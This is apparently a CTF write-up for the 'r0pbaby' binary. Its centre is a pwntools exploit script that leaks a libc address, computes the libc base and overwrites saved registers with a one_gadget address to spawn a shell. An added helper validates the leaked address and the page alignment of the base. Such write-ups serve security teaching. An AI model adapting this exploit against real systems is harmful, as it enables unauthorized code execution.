pwn - r0pbaby
2021. 2. 5. 08:41ㆍCTF's Write-up
```python
from pwn import *

context.log_level = "debug"
r = process("./r0pbaby")
e = ELF("./r0pbaby")
l = e.libc

# one_gadget candidate offsets for the target libc (write-up's values)
shell = [0x4f3d5, 0x4f432, 0x10a41c]
system_off = l.sym['system']

# menu 2: ask the binary for the address of a libc symbol
r.sendlineafter(b": ", b"2")
r.sendlineafter(b": ", b"system")
r.recvuntil(b": ")
leak = int(r.recv(18), 16)   # "0x" followed by 16 hex digits
libc_base = leak - system_off
one_shot = libc_base + shell[0]
log.info("leak = " + hex(leak))
log.info("libc_base = " + hex(libc_base))
log.info("one_shot = " + hex(one_shot))

# menu 3: the chain is memcpy'd over the saved registers; 8 filler bytes
# cover the saved frame pointer and the gadget address lands after it
pay = b""
pay += b"A" * 0x8
pay += p64(one_shot)
r.sendlineafter(b": ", b"3")
r.sendlineafter(b": ", str(len(pay)).encode())
r.sendline(pay)
r.interactive()
```
In the memcpy, the input is copied to savedregs, and savedregs here is the SFP (saved frame pointer), so overwriting it is all that is needed.
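The script above reads the leaked address with a fixed-width `recv(18)`, which silently yields garbage if the prompt's formatting differs, and it never checks that the computed base is plausible. As an added example (not from the write-up), here is a parser that extracts the leak by pattern and refuses a libc base that is not page-aligned, which is the usual symptom of using offsets from the wrong libc build; the sample output line and the `system` offset are constructed, not taken from the target.

```python
import re

PAGE = 0x1000
ADDR_RE = re.compile(rb"0x([0-9a-fA-F]{1,16})")

def parse_leak(line: bytes) -> int:
    """Extract the first 0x-prefixed address from a line of program output.

    Raises ValueError instead of returning garbage when no address is present,
    which a fixed-width recv(18) would not do.
    """
    m = ADDR_RE.search(line)
    if m is None:
        raise ValueError("no address in output: %r" % line)
    return int(m.group(1), 16)

def libc_base(leak: int, sym_off: int) -> int:
    """Compute the libc load address from a leaked symbol and its file offset.

    The result must be page-aligned; anything else means the offset belongs
    to a different libc build than the one that produced the leak.
    """
    base = leak - sym_off
    if base <= 0 or base % PAGE:
        raise ValueError("unaligned base %#x: wrong libc offsets?" % base)
    return base

# Constructed sample output (not a real leak) and a constructed symbol offset.
SAMPLE_LINE = b"Symbol system: 0x00007ffff7a33440\n"
SAMPLE_SYSTEM_OFF = 0x4f440

if __name__ == "__main__":
    leak = parse_leak(SAMPLE_LINE)
    print(hex(leak), hex(libc_base(leak, SAMPLE_SYSTEM_OFF)))
```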